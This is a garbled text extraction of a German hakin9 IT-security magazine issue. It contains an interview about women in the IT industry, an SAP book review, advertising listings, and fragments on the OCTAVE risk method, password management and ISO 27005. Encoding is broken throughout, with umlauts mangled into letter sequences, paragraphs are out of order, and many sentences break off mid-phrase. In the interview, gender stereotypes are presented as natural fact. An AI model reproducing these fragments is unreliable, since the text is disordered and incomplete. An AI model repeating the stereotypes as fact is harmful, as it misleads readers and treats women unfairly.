hakin9 Wie sieht eine Sicherheitsuumlberpruumlfung mithilfe des Penetrationstests ausTobias Glemser Zunaumlchst bedarf es einer klaren Ziel-vorstellung Entweder haben Kunden diese bereits oder sie wird im Rahmen eines Workshops gemeinsam erarbeitet Dabei ist es meist sinnvoll mehrstufig vorzu-gehen und die Themen in verschiedenen Arbeitspake-ten abzuarbeiten Im Rahmen eines Kick-Offs werden die Beteiligten informiert und in den Ablauf integriert
10201044
INTERVIEW
hakin9 Lassen Sie uns bitte ein wenig uumlber sich selbst wissen wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie in der IT-Branche taumltig sindUlrike Peter Ich bin PR-Spezialistin und Journalis-tin durch und durch Die Liebe zum Schreiben ent-deckte ich fruumlh Nach ersten Gehversuchen als freie Mitarbeiterin bei einer Tageszeitung absolvierte ich vor zehn Jahren ein Volontariat in einer PR-Agentur mit parallelem Fernstudium bdquoJournalismusldquo Die ers-ten Tage in der Agentur waren wie ein Kopfsprung ins kalte Wasser Denn obwohl ich das journalistische Ruumlstzeug besaszlig wusste ich anfangs nicht mal wo sich die Escape-Taste an meinem PC befand hatte aber die Aufgabe ohne spezielles Hintergrundwissen uumlber komplexe Technologien detaillierte Berichte zu formulieren Da dies den Ehrgeiz in mir weckte ar-beitete ich mich schnell in die Materie ein und stell-te fest dass Public Relations in Verbindung mit der Erstellung technologischer Texte mein Steckenpferd ist Heute bin ich Geschaumlftsfuumlhrerin meiner eigenen PR-Agentur und obwohl ich mittlerweile auch in wei-teren Branchen und Aufgabengebieten zuhause bin ist die Freude daran bdquotrockeneldquo und komplexe Inhalte lebendig werden zu lassen noch genauso vorhanden wie am ersten Tag
hakin9 Viele glauben dass Computer Maumlnnersache sind Was halten Sie davonUlrike Peter Die landlaumlufige Meinung existiert nach wie vor dass Maumlnner ein besseres technologisches Verstaumlndnis mitbringen Dies resultiert nicht selten aus Vorurteilen laumlsst sich aber auch nicht komplett abstreiten Denn nicht nur Erfahrungswerte sondern auch Belege aus der Hirnforschung zeigen dass Frauen besser mit Sprache umgehen koumlnnen und Maumlnner sich in Naturwissenschaften wohler fuumlhlen Es liegt wohl ein Stuumlck weit in der Natur der Sache
Aber wie heiszligt es so schoumln bdquoAusnahmen bestaumltigen die Regelldquo Und der Trend zeigt beispielsweise dass Frauen zunehmend technische Studiengaumlnge bele-gen
hakin9 Heutzutage sind wir uumlberall von Computern umgeben In der IT-Branche herrscht trotzdem ein Frauenmangel Woran liegt dies Ihrer Meinung nachUlrike Peter Noch lockt es wesentlich mehr Maumlnner in technische Berufe als Frauen Ich denke das Verhaumlltnis wird auch in Zukunft so bleiben ndash auch wenn sich die klassische Rollenverteilung verschiebt und die bdquoGren-
bdquoErfolgreiche Frauen in der IT-Branche - ein Erfahrungsberichtldquo
Interview mit Ulrike Peter
Interview mit Ulrike Peter
hakin9orgde 45
Vorgesetzten und zum anderen nach den Faumlhigkeiten der Frau Jeder Mitarbeiter der neu eingestellt wird steht vor der Aufgabe sich zu beweisen ndash und sollte die Moumlglichkeit dazu erhalten Jedoch werden Frau-en in typischen Maumlnnerberufen oft kritischer beaumlugt und stehen laumlnger auf dem Pruumlfstand Dies passiert teils unbewusst Auch beweisen Studien immer wie-der dass maumlnnliche Arbeitnehmer im gleichen Job mehr verdienen als weibliche Hier macht die Gesell-schaft aber eine Entwicklung durch und dies reguliert sich sicherlich zumindest ein Stuumlck weit im Laufe der naumlchsten Jahre
hakin9 Was macht Ihnen am meisten Spaszlig bei der Arbeit in der IT-BrancheUlrike Peter Bevor ich mich selbstaumlndig machte war ich bereits in einem anderen Unternehmen in der Ge-schaumlftsleitung taumltig ndash jedoch konnte ich den Stift zum Schreiben nie aus der Hand legen Es reizt mich im-mer wieder neue technologische Themen zu erkunden und dabei nicht nur an der Oberflaumlche zu kratzen son-dern Detailtiefe zu erlangen um fundiert und lesens-wert uumlber ein Thema berichten zu koumlnnen Im Laufe der Jahre habe ich eine starke Affinitaumlt zur IT-Security entwickelt Ich finde es spannend uumlber Sicherheits-luumlcken Verschluumlsselungstechniken und vieles weite-re zu schreiben Daruumlber hinaus macht es mir groszligen Spaszlig IT-Unternehmen durch die richtige PR-Strategie nach vorn zu bringen und entsprechende Maszlignahmen in die Tat umsetzen Beim Kennenlernen eines poten-ziellen Neukunden im ersten Moment manchmal hin-sichtlich der technischen Fachkompetenz unterschaumltzt zu werden und dann schnell durch Know-how zu uumlber-zeugen bestaumltigt mich immer wieder in dem was ich tue
hakin9 Was sollte unternommen werden um die Ressentiments von Frauen gegenuumlber IT-Jobs abzubauenUlrike Peter Ich glaube dem kann man bzw Frau nur entgegenwirken indem sie den Mut hat ihre Interessen zu verfolgen und sie unter Beweis zu stellen Aus Er-fahrung wenn jemand seine Faumlhigkeiten zeigt und en-gagiert an eine Sache herangeht ruumlckt das Geschlecht automatisch in den Hintergrund
Wir bedanken uns fuumlr das Gespraumlch
zenldquo in beide Richtungen mehr und mehr verschwim-men Denn auch Maumlnner finden wir heute in Berufen die vor Jahren ausschlieszliglich Frauen zugeordnet wur-den Und wir sind zwar von elektronischen Geraumlten wie PCs Smartphones etc umgeben und diese werden auch rege von beiden Geschlechtern genutzt ndash aber ei-nen technischen Job zu ergreifen ist ein anderes paar Schuhe Hierzu gehoumlrt ein besonderes Faible Die Be-weggruumlnde weshalb in diesem Segment Frauenman-gel herrscht sind meiner Meinung nach Ihnen fehlt manchmal der Mut sie erhalten nicht immer die glei-chen Chancen oder ndash und das wird der Hauptgrund sein ndash es liegen schlichtweg die Interessen in anderen Be-reichen
hakin9 Woraus resultieren die Vorurteile gegen die Frauen die sich mit Computern beschaumlftigenUlrike Peter Die IT ist (und bleibt es sicher auch) eine Maumlnnerdomaumlne ndash Frauen in der IT-Branche sind Para-diesvoumlgel Wie in allen Berufen in denen seit jeher ein Geschlecht etabliert ist sich Prozesse eingeschliffen und bewaumlhrt haben ist es erst einmal fremd und ge-woumlhnungsbeduumlrftig wenn sie sich veraumlndern So liegen die Vorurteile zum einen daran dass es nicht uumlblich ist wenn Frauen in diesen Berufen arbeiten und Maumlnnern die bdquoTechnikldquo zugeordnet wird ndash zum anderen resultie-ren sie daraus dass die unterschiedlichen Faumlhigkeiten und Interessen der Geschlechter einfach naturgege-ben sind So wie kleine Jungen mit Autos spielen und Maumldchen mit Puppen stecken auch spaumlter gewisse Verhaltensweisen und Interessen in uns die bereits in der Kindheit gepraumlgt werden Greift das weibliche Ge-schlecht im Berufsleben ploumltzlich zum bdquoAutoldquo so ist dies ungewoumlhnlich und wird erst einmal hinterfragt
hakin9 Wie sieht die Situation von Frauen in der IT-Branche aus Ist es leicht als begabte IT-Expertin einen Job in einem Unternehmen zu bekommenUlrike Peter Frauen in der IT-Branche sind haumlufig in Marketingabteilungen zu finden ndash aber zum Beispiel auch bei der schreibenden Zunft in Fachverlagen In diesen Jobs herrscht in meinen Augen Chancengleich-heit Als IT-Expertin in einem technischen Beruf wie Ad-ministrator Entwickler oder Aumlhnliches sieht es dagegen anders aus In diesem Segment haben es weibliche Fachkraumlfte meiner Ansicht nach schwerer Die Huumlrde zum Bewerbungsgespraumlch eingeladen zu werden ist houmlher Bekommt sie die Chance dazu wird vielleicht et-was genauer hingeschaut aber letztlich zaumlhlt die Kom-petenz die unterm Strich den entscheidenden Aus-schlag geben wird
hakin9 Wie werden Frauen von Maumlnnern als ihre Mitarbeiter wahrgenommenUlrike Peter Dies laumlsst sich nicht pauschalisieren und richtet sich zum einen nach der Einstellung des
10201046
REZENSIONEN
Das Buch SAP for DFPS Implementierung und Customizing basiert auf mehr als 20 Jahren Er-fahrung die die Autoren insgesamt bei der Ent-
wicklung Implementierung aber auch Schulung der Loumlsung sammeln konnten
Die uumlber 650 Seiten vollgepacktes Wissen sollten sie nicht abschrecken dieses Buch in die Hand zu nehmen Es ist sehr gut und fluumlssig geschrieben Man schafft es sollten sie ein schneller LeserIn sein in zwei Tagen
Sie benoumltigen keine tiefgreifenden SAP-Kenntnisse zum Verstaumlndnis daher ist es fuumlr Entscheider genauso geeignet wie fuumlr Projektleiter Architekten funktionale Mitarbeiter Basismitarbeiter oder externe Berater
Komplexe Zusammenhaumlnge werden sehr schoumln und bildhaft beschrieben damit auch fuumlr den SAP-Laien das Vorgehen verstaumlndlich beschrieben wird Erwaumlh-nenswert finde ich in diesem Zusammenhang Rubiks Zauberwuumlrfel
Das Buch ist sehr strukturiert aufgebaut und umfasst unverzichtbare Grundlagen in den Teilen I-IIIFuumlr Experten wird es dann in Teil IV richtig spannend und interessant
Die von SAP entwickelte fast eierlegende Wollmilch-sau erfordert ein umfangreiches Nachschlagewerk zur Implementierung Den Autoren ist dies hiermit gelun-gen
Ihnen ist es auszligerdem gelungen aufzuzeigen wie komplexe bdquoUnternehmensstrukturenldquo bewaumlltigt und Kos-ten reduziert und kontrolliert werden koumlnnen
Das Beispielprojekt bdquoTsunamildquo verdeutlicht dabei an einem nicht so komplexen Projekt die Anforderungen Beleuchtet wird zB wie militaumlrische Kernprozesse wie etwa die Logistik substanzielle Einsparungen von ca 30 erzielen koumlnnten als auch die Unterstuumltzung von Einsaumltzen verbessert werden koumlnnten (Beschleunigung der Verlegung um bis zu 50 -70)
Des Weiteren wird die Interoperabilitaumlt sehr schoumln he-raus gestellt und die integrativen Aspekte stets im Blick behalten
Hervorheben sollte man die organisatorische Flexi-bilitaumlt und Logistik wie das Logistic Assessment Pro-zessmanagement Qualification Management inkl der Uumlbernahme von Trainingsdaten das Managementkon-zept BSC (Balanced Scorcard) die Einsatzmoumlglichkei-ten von mobilen Anwendungen fuumlr Schutzaufgaben SOA und NCW bzw NetFuumlOp mit DFPS
Der Mehrwert wird zB am Meldewesen der NC3A durch Automatisierung von weiten Teilen schoumln heraus gearbeitet
Die ausfuumlhrlichen bebilderten Beispiele stellen eine gelungene Verbindung zwischen Theorie und Praxis bzw Anwendung dar In der SAP-typischen Struktur wurden die neuen und bereits erwaumlhnten Funktionen sinnvoll und gekonnt integriert
Des Weiteren findet sich fuumlr die richtige IT-Architektur ein schoumln gefuumlllter Werkzeugkasten mit den dazuge-houmlrigen Dorsquos and Dontrsquos Natuumlrlich darf auch das best practices nicht fehlen sowie der Ausblick auf zukuumlnftige Entwicklungen
Egal ob sie sich fuumlr eine Neuintegration oder eine Co-re2Defense Loumlsung entscheiden
die Kapitel zu den Themen
moumlchte ich ihnen unbedingt ans Herz legen
FAZITDieses Buch sollte keinem Entscheider und IT-Verant-wortlichen vorenthalten werden
Praumldikat besonders empfehlenswert
Autor Nicole Huck
SAP for DFPSImplementierung und CustomizingGalileo Press Bonn 20101 Auflage 2010AutorenBernhard EscherichHeinrich PfriemerWolfgang Ullwer
Datenschutz ist EU-weit gesetzliche Anforde-
rung Wir sorgen fuumlr die Erfuumlllung rechtlicher
Vorschriften und kuumlmmern uns um ein ange-
messenes Datenschutzniveau in Ihrem Unter-
nehmen auch international
wwwblossey-partnerde
Recommended Sites
Securitymanagerde ist eine Produktion des
Online-Verlag FEiG amp PARTNER Seit dem
Start hat sich Securitymanagerde zu einem
fuumlhrenden Online-Informationsportal in
Deutschland entwickelt und versteht sich als
unabhaumlngiger Informationsdienstleister der
IT- und Information-Security-Branche
wwwsecuritymanagerde
Pericom base camp IT-Security Unser Ziel ist
es unsere Kunden vor moumlglichen Gefahren
fuumlr Ihre IT-Infrastruktur bestmoumlglich zu schuumlt-
zen Neben der Analyse von Risikopotentia-
len durch Security Audits bieten wir durch
die Implementierung von Security-Loumlsungen
Schutz vor konkreten Gefahren
wwwpericomat
Happy-Security ist ein neues Portal mit Secu-
rity-Challanges IT-Quiz Web-Bibliothek Multi-
media-Center amp vielen weiteren Features
wwwhappy-securityde
CloudSafe stellt seinen Nutzern eine Plattform
zur kryptographisch sicheren Ablage und Verwal-
tung von sensiblen Daten zur Verfuumlgung Nutzer
koumlnnen auf CloudSafe beliebig viele Dokumente
in virtuellen Safes ablegen Es koumlnnen weite-
ren Personen individuelle Zugriffsrechte auf die
Safes eingeraumlumt und somit ein sicherer Daten-
austausch ermoumlglicht werden
wwwcloudsafecom
AV-Comparatives geht hervor aus dem Inns-
brucker Kompetenzzentrum und gilt als eines
der bekanntesten unabhaumlngigen Testhaumluser
fuumlr Antiviren-Software
wwwav-comparativesorg
Die Seed Forensics GmbH bietet fuumlr Strafver-
folgungsbehoumlrden professionelle Unterstuumltzung
in den Bereichen der Datensicherstellung und
Datentraumlgerauswertung Selbstverstaumlndlich
entsprechen unsere Mitarbeiter unser tech-
nisches Equipment und auch unsere Raumlumli-
chkeiten den notwendigen Anforderungen
wwwseed-forensicsde
Wollen Sie Ihre Seite empfehlen kontaktieren Sie bitte dehakin9org
Die Netzwerktechnik steht auf wwweasy-ne-
tworkde im Mittelpunkt Artikel Tutorials und
ein Forum bieten genuumlgen Stoff fuumlr kommende
wwweasy-networkde
Computerfreaks houmlher schlagen laumlsst Geek
Wear mit intelligenten Spruumlchen eine riesige
Auswahl Gadgets und natuumlrlich auch viele
Hacker Tools
wwwgetDigitalde
Recommended Companies
SEC ConsultSEC Consult ist der fuumlhrende Berater
fuumlr Information Security Consulting in
Zentraleuropa Die vollstaumlndige Unab-
haumlngigkeit von SW- und HW-Herstellern
macht uns zum echten Advisor unserer
Kunden Unsere Dienstleistungen umfa-
ssen externeinterne Sicherheitsaudits
(Web-) Applikationssicherheit (ONR 17-
700) Sicherheitsmanagement-Prozesse
(ISO 27001) etc
wwwsec-consultcom
SEC Consult
Tele-Consulting GmbH
Sicherheit hakin9 und crsquot Autoren jah-
relange Erfahrung bei der Durchfuumlhrung
von Penetrationstests und Security-Au-
dits eigener Security Scanner bdquotajanasrdquo
Sicherheitskonzepte Risikoanalysen
ISO 27001-Auditoren VoIP-Planung
und -Security
wwwtele-consultingcom
B1 SystemsDie B1 Systems ist international taumltig
in den Bereichen LinuxOpen Source
B1
Systems spezialisiert sich in den Be-
reichen Virtualisierung und Cluster
infob1-systemsde
wwwb1-systemsde
Blossey amp Partner
Consulting DatenschutzbuumlroDatenschutz ist EU-weit gesetzliche An-
forderung Wir sorgen fuumlr die Erfuumlllung
rechtlicher Vorschriften und kuumlmmern
uns um ein angemessenes Daten-
schutzniveau in Ihrem Unternehmen
auch international Wir erledigen alle er-
forderlichen Aufgaben die Faumlden behal-
ten Sie in der Hand Nutzen Sie unser
Erstberatungsgespraumlch
wwwblossey-partnerde
secXtreme GmbHschuumltzt Ihre Web-Anwendungen bis
auf Applikationsebene Dazu gehoumlrt
sowohl die Pruumlfung von Applikationen
(Pentests und Code-Reviews) als auch
Beratungsleistungen fuumlr Sicherheit im
Entwicklungsprozess und Schutzlouml-
sungen (Web Application Firewalls) bei
Mittelstand
wwwsec-Xtremecom
Mabunta
spezialisierter und kompetenter Partner
heitsfragen in allen Unternehmens-
bereichen verbinden Wachstum mit
sicherer Kommunikation
Alles in allem- mabunta bdquoone-face-to-
the-customerldquo Ihr Spezialist in Fragen
wwwmabuntade
Recommended Companies
SecureNet GmbH MuumlnchenAls Softwarehaus und Web Application
Security Spezialist bieten wir Expertise
rund um die Sicherheit von Webanwen-
dungen Anwendungs-Pentests Sour-
delines Beratung rund um den Software
Firewalls Application Scanner Fortify
wwwsecurenetde
underground_8
secure computing gmbhWir entwickeln und vertreiben securi-
und Antispam Unsere Loumlsungen sind
hardwarebasiert und werden uumlber Dis-
tributoren Reseller und Systemintegra-
toren implementiert und vertrieben
wwwunderground8com
OPTIMAbit GmbHWir sind Spezialisten fuumlr Entwicklung
und Mobile Applikationen gegen Angriffe
externer und interner Art Unsere Dien-
ste umfassen Audits Code Reviews
Penetrationstest sowie die Erstellung
von Policies Zusaumltzlich bieten wir Semi-
wwwoptimabitcom
m-privacy GmbH
einfach zu bedienen
So praumlsentieren sich die von m-privacy
tesiegel Es bietet als erstes System
weltweit einen kompletten Schutz vor
Online-Spionage Online-Razzien und
gezielten Angriffen
wwwm-privacyde
NESECNESEC ist Ihr Spezialist fuumlr Penetra-
tionstests Sicherheitsanalysen und
cherheitspruumlfungen Ihrer Netzwerke
und Webapplikationen sowie bei Sour-
ce Code Audits Bei Bedarf optimieren
wir Ihre Policy sensibilisieren Ihre
nehmen nach ISO 27001
wwwnesecde
Seed Forensics GmbH
fuumlr Strafverfolgungsbehoumlrden profe-
ssionelle Unterstuumltzung in den
Bereichen der Datensicherstellung
und Datentraumlgerauswertung Selbst-
verstaumlndlich entsprechen unsere
Mitarbeiter unser technisches Equip-
0ment und auch unsere Raumlumlichkeiten
den notwendigen Anforderungen
wwwseed-forensicsde
Protea Networks
Loumlsungen Verschluumlsselung Firewall
ring etc Wir bieten umfassende Bera-
tung Vertrieb von Security-Hard- und
Software Installation und umfangreiche
nings) Protea setzt auf Loumlsungen der
dafuumlr direkten inhouse-Support bereit
wwwproteanetworksde
secadmsecadm ist durchtrainierter Spezialist fuumlr
Airbags ABS und Sicherheitsgurte in der
Mannjahren Erfahrung beraten entwi-
fuumlr Kunden weltweit Der Fokus liegt da-
und Security-Management Risiko-Analy-
se die Sicherheitsberatung Auditing Se-
curity-Leitfaumlden Software-Entwicklung
wwwsecadmde
OCTAVE
hakin9orgde 27
onsbezogene Assets und deren Impact auf die Or-ganisation sowie deren derzeitige Schutzmechanis-men fest Darauf aufbauend werden die kritischsten
dafuumlr bestimmt Anschlieszligend wird fuumlr jedes kri-
Erkennen von Verwundbarkeiten der Infra-
struktur ndash Hier wird die hinter den kritischen Assets liegende Infrastruktur bewertet Dabei werden kriti-sche Infrastrukturpfade und informationstechnolo-gische Komponentenklassen aufgestellt und einer technischen Uumlberpruumlfung ndash dem Penetration Test ndash
tung direkt ein
ndash In dieser Phase ent-scheidet das Analyse-Team wie mit den kritischen Assets umgegangen werden soll Basierend auf die
organisationsweite Schutzstrategie und ein Plan fuumlr die Reduzierung der erkannten Risiken die auf die kritischen Assets und deren Infrastrukturen einwir-ken koumlnnen erstellt
Die einzelnen Prozesse die den drei Phasen hinter-legt sind stellen sicher dass von allen Organisati-
onseinheiten und von allen hierarchischen Ebenen ndash also von den MitarbeiterInnen uumlber operationa-les und strategisches Management bis hin zum Ma-nagement der ersten Ebene alle Sichtweisen und die damit verbundenen Bewertungen der kritisch-
koumlnnen OCTAVE generiert so eine organisationsweite Sicht
auf die aktuellen Informationssicherheitsrisiken
zen
wie die erstellte Schutzstrategie und der Plan zur Risikoreduzierung umgesetzt werden kann
Handlungs-Planes
UumlberwachenBeobachten des Handlungsplanes nach Effektivitaumlt Das beinhaltet zB das Beobachten der Risiken fuumlr jede Aumlnderung
ken
Die OCTAVE Methode ersetzt kein Risikomanagement sondern gehoumlrt in ein strukturiertes Risikomanage-
Abbildung 4 Octave und Risikomanagement
10201028
ABWEHR
ment eingebettet welches nach einem act Zyklus arbeitet (vergl Abb 4)
Die Organisation sollte in periodischen Abstaumlnden ihre ermittelte Baseline zuruumlcksetzen indem eine nochmalige Risikoanalyse durchgefuumlhrt wird Diese Zeitspanne kann vorgegeben werden oder von wich-tigen Ereignissen wie zB eine Restrukturierungs-maszlignahme der zB Netzwerkinfrastruktur uvm an-gestoszligen werden Zwischen den Analysen kann die Organisation periodisch neue Risiken identifizieren analysieren und in Relation zu bereits existieren-den Risiken Risiko reduzierende Maszlignahmen entwi-ckeln
Da die Risikoanalyse nur einen Teil des Risikoma-nagements darstellt ist die OCTAVE Methode mit ih-rer offenen Schnittstelle hervorragend geeignet um als bdquoBest Practiceldquo-Grundlage die ISO 27001 Norm zu im-
plementieren und in der Umsetzungsphase den COBIT 40 Standard zu verwenden
OCTAVE bildet die Grundlage der in der ISO 27001
trachtungsbereiches feststellen von kritischen Orga-nisationswerten qualitative und eventuell quantitative Betrachtung von Risiken Entwicklung von entspre-chenden Kontrollmaszlignahmen um Risiken zu minimie-ren oder aber auch zu akzeptieren Anschlieszligend kann man unter Zuhilfenahme von COBIT die der ISO Norm zugeschriebenen Kontrollen implementieren Man kann somit die IT Sicherheitsstrategie der betrachteten Organisation mit einer Risikoanalyse nach dem OCTA-VE Ansatz und dem standardisierten Reifegrad-Modell nach COBIT - gepruumlft nach ISO 27001 - auswerten und umsetzen (Verg Abb 5)
Abbildung 5 Mapping auf ISO 27001
Mehr Informationenwwwcertorgoctave
wwwisacaorgwwwstandards-onlinenetInformationSecurity-
Standardhtm
MAG HELMUT KAUFMANN MSCDozent an der Fachhochschule St Poumllten und ua taumltig im Be-reich Secure Data Center Management Cloud Computing Di-saster Recovery and Business Continuity Fraud Detection
News
hakin9orgde 29
Tausende Passwoumlrter von Usern und Administratoren sind im UmlaufMan stelle sich komplexe IT Landschaften vor die geo-
grafisch verteilt sind und viele Mitarbeiter die in verschie-
dene bdquoRollenldquo schluumlpfen Eine Buchhalterin hat nicht nur
Zugang zu standardisierten Anwendungen sondern auch
zum Internetbanking der FIBU Software und anderen
kaufmaumlnnischen Programmen wie SAP Interessant und
zunehmend komplex wird es bei den IT Administratoren
Natuumlrlich koumlnnen sich diese von vielen fuumlr ihre mathema-
tischen Faumlhigkeiten bewunderten auch nicht dutzende
von Passwoumlrtern merken sondern helfen etwas nach Pro
Anwendung wird ein Passwort vergeben das sich diese
dann fuumlr laumlngere Zeit im Gedaumlchtnis behalten Mit dieser
Feststellung wird die gesamte Problematik sofort offenbar
ohne in technische Details gehen zu muumlssen ein Pass-
wort fuumlr laumlngere Zeit im Gedaumlchtnis
Guter Rat ist teuer - und umsonstRichtlinien zur Passwortgestaltung gibt es unzaumlhlige und
viele sind gut gemeint Die Laumlnge wird vorgegeben und
auch die zu verwendenden Zeichen die alle 4 Wochen
zu aumlndern sind und natuumlrlich nicht auf einem Post-It unter
der Tastatur kleben sollen Selbst wenn dies eingehal-
ten wird vergisst man sein neues Passwort spaumltestens
wenn man 2 Wochen auf Urlaub war und auch der Help-
Desk freut sich dass man wieder zuruumlck ist Auch der
Auditor ist zumindest milde gestimmt wenn die zentralen
Passwoumlrter zumindest in einer gesicherten Excel Liste
zusammengefasst sind Von IT Security sollte man aber
dabei besser nicht sprechen da jeder Administrator auf
alle Passwoumlrter zugreifen kann Spaumltestens bei automa-
tisierten (unattended) Passwoumlrtern die via Skript fixiert
sind und auf eine Anwendung oder Datenbank zugreifen
sind verhaltensorientierte Ansaumltze obsolete
Passwortstruktur ist unbekanntKaum ein IT Verantwortlicher hat verlaumlssliche Informa-
tionen uumlber die Strukturen und Verbreitungsgrade von
Passwoumlrtern in einer Organisation Bei Implementie-
rung eines automatisierten Passwort-Managements
wird oft erst festgestellt dass zehntausende privilegier-
te Administratorkonten vorhanden sind aber nur 20
davon als Administratorkonten dienen Der uumlberwiegen-
de Teil der Passwoumlrter sind Application-to-Application
(A2A) und Application-to-Database (A2D) Konten die
in Skripts den Zugriff ermoumlglichen Und natuumlrlich nur in
seltensten Faumlllen geaumlndert werden und somit immer ei-
ne Hintertuumlre auch fuumlr den Ex-Mitarbeiter offenlassen
Die Passwort Autoritaumlt Freiwilligkeit und Empfehlungen sind nicht angebracht Die Zugangsberechtigungen sind als Schluumlssel fuumlr Safes
mit allen Geheimnissen der Organisation anzusehen Das
Ergebnis einer Reflektion der Problematik bdquoPasswoumlrterldquo
kann nur sein dass ein automatisiertes und auditierbares
Software-Werkzeug in Frage kommen kann Die Durchset-
zung der Passwoumlrter Policies Zuteilung von Einmal-Pass-
woumlrtern und vor allem eine sichere Authentifizierung und
Ablage dieser ist natuumlrlich ebenso ein Must-Have In Zeiten
wie diesen sollte es auf Knopfdruck moumlglich sein einen Ad-
ministrator zu sperren oder zeitlich begrenzte Passwoumlrter
fuumlr externe Dienstleister ausstellen zu koumlnnen
Antares NetlogiX empfiehlt nach eingehender Analy-
se - des sehr uumlberschaubaren Marktes - die Loumlsung
bdquoCloakware Password Authorityldquo Die ersten erfolgrei-
chen Referenzprojekte und Kundenmeinungen haben
diese Meinung weiter verstaumlrkt
Wetten dass Ihr groumlszligtes Betriebsgeheimnis ungeschuumltzt istWie ein schlechter Sickerwitz stellt man sich zuerst die Frage was ist unser groumlszligtes Betriebsgeheimnis Die Kundenlisten die Projektdokumentationen und Strategiepapiere die Zahlen auf den Bankkonten oder gar die private Telefonnummer vom Vorstandsvorsitzenden Schlussendlich sind es die Passwoumlrter und Zugangsberechtigungen auf saumlmtliche Anwendungen und Datenbanken in jedem Unternehmen oder Organisation
10201030
ABWEHR
In der heutigen Ausgabe werde ich Ihnen darstellen warum es nuumltzlich ist sich mit dem Risikomanage-ment der IT zu beschaumlftigen und dabei auf das Mo-
dell der ISO 27005 zuruumlck zu greifenAuf dieses Thema wurde bereits in einer fruumlheren
Ausgabe eingegangen in diesem Artikel wird aber mehr auf die Norm und den eigentlichen Prozess mit den einzelnen Schritten eingegangen
Groumlszligere Unternehmen sind schon von Gesetz her verpflichtet sich mit dem Themenbereich Risiko-management zu beschaumlftigen (Aktiengesetz Kon-TraG GmbH-Gesetz uAuml) Ein Teil dieses Risikoma-nagements ist das IT-Risikomanagement welches sich ndash wie der Name es schon sagt ndash mit den Risi-ken im IT-Bereich beschaumlftigt Eine Problematik beim Risikomanagement allgemein und speziell bei der
IT-Risikomanagement ndash Wozu brauche ich das
In der letzten Ausgabe habe ich Ihnen ausfuumlhrlich die Norm ISOIEC 27001 vorgestellt und einen kurzen Einblick in die 27000-Familie gegeben Ein Teil dieser Familie ist die ISO 27005 die sich mit dem IT-Risikomanagement befasst
IN DIESEM ARTIKEL ERFAHREN SIE WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
men
IEC 27001)
Andreas Lentwojt
Abbildung 1 Aufbau eines Risikomanagementsystems (allgemein)
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 31
entgegenwirkt Richtlinien wie Basel II oder Euro-SOX fordern diese Ausrichtung seit langem
Die ISO 27005 ist branchen- und groumlszligenunabhaumlngig Somit koumlnnen auch kleinere und mittlere Unternehmen durch die Adaption der Inhalte auf die betrieblichen An-forderungen ein schlankes und effektives IT-Risikoma-nagement aufbauen Gerade sensible Branchen wie Automotive Healthcare Software oder Telekommuni-kation werden hier angesprochen Aufgrund aumlhnlicher Strukturen laumlsst sich die ISO 27005 ohne groumlszligeren Auf-wand in ein unternehmensweites Risikomanagement integrieren kann aber auch raquosololaquo umgesetzt werden Im Gegensatz zur ISOIEC 27001 ist die ISOIEC 27005 selbst nicht zertifizierbar
Kapitel 1 ndash Risikomanagementsystem allgemeinWie bei der ISO 27001 geht es auch bei der ISO 27005 nicht um das bdquowasldquo sondern um das bdquowieldquo Es ist ein Leitfaden zur Implementierung eines Risikoprozesses im Kontext der Informations- und Telekommunikations-technologie Wie sieht so ein Risikoprozess nun aus Ganz allgemein betrachtet geht es wiederum um ein Managementsystem welches aus 6 Schritten (vergl Abb 1) besteht
Informationstechnologie ist die Bewertung der er-kannten Risiken Bereits seit einigen Jahren gab es nationale Normen die sich mit einem standardisier-ten Vorgehensmodell beschaumlftigten Im Juni 2008 wurde daraus die international anerkannte Norm ISOIEC 270052008 (ehem BS 7799-32006) ISO 270052008 ist eine spezielle Auspraumlgung der ISOIEC 310002009 die sich mit dem Risikomanagement all-gemein befasst Die genauen Bezeichnungen lauten
les and guidelinesldquo
nagementldquo
Warum uumlberhaupt ein IT-Risikomanagementsystem im Unternehmens-Kontext
Datenverlust und -diebstahl gehoumlren zu den groumlszligten Problemen in Unternehmen Bisher bezog sich Risiko-management in Unternehmen hauptsaumlchlich auf Markt- und Adressrisiken sowie auf finanzielle Risikofaktoren Das Risikomanagement im IT-Bereich wurde weitgehend vernachlaumlssigt Dabei lassen sich Sicherheitsluumlcken mit-tels Risikomanagement aufdecken und minimieren was auch Regressforderungen an die Unternehmensfuumlhrung
Abbildung 2 Aufbau der ISO 270052008
10201032
ABWEHR
Kapitel 2 ndash Der Standard ISOIEC 270052008Die ISO 27005 stellt eine Anleitung zur IT Risikoanaly-se und zum Risikomanagement im IT Bereich dar Sie beinhaltet dabei einerseits eine Beschreibung des kom-pletten Risikomanagementprozesses als Ganzes und andererseits eine genaue Beschreibung der einzelnen Schritte des Risikomanagementprozesses und der Ri-sikoanalyse Die Anhaumlnge der IEC 27005 liefern zudem nuumltzliche Informationen zur Implementierung eines Ri-sikomanagementsystems im Bereich Informationssi-
Norm ISO 27001
gen auf bedrohte Werte direkte und indirekte Be-drohungen und Schwachstellen
schaumltzung der Risikowahrscheinlichkeit und des Ri-sikoniveaus
managementmaszlignahmen
Aus diesen einzelnen Kapiteln der Norm wird der IT-Sicherheitsprozess entwickelt (vergl Abb 3)
Kapitel 3 ndash Die Phasen
Defi nition der RahmenbedingungenIn einem ersten Schritt wird in einer Schutzbedarfsfest-stellung (High Level Risk Analysis) der Schutzbedarf fuumlr
Schutzbedarfskategorie niedrig bis hoch wird idR auf eine detaillierte Risikoanalyse verzichtet Dies erlaubt ei-ne schnelle und effektive Auswahl von grundlegenden Sicherheitsmaszlignahmen bei gleichzeitiger Gewaumlhrleis-tung eines angemessenen Schutzniveaus IT-Systeme der Schutzbedarfskategorie bdquosehr hoch sind einer de-taillierten Risikoanalyse zu unterziehen auf deren Basis individuelle Sicherheitsmaszlignahmen ausgewaumlhlt werden
Abbildung 3 Der Sicherheitsprozess gem ISO 270052008
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 33
Diese Option kombiniert die Vorteile des Grund-schutz- und des Risikoanalyseansatzes da alle IT-Systeme mit hohem Schutzbedarf wirksam und ange-messen geschuumltzt werden Maszlignahmen koumlnnen fuumlr die anderen Systeme mit Hilfe des Grundschutzes schnell und effektiv ausgewaumlhlt werden Diese Methode stellt in den meisten Einsatzumgebungen eine empfehlenswer-te Strategie zur Risikoanalyse dar
Zu den einzelnen Kriterien die festgelegt werden muumlssen gehoumlren ua
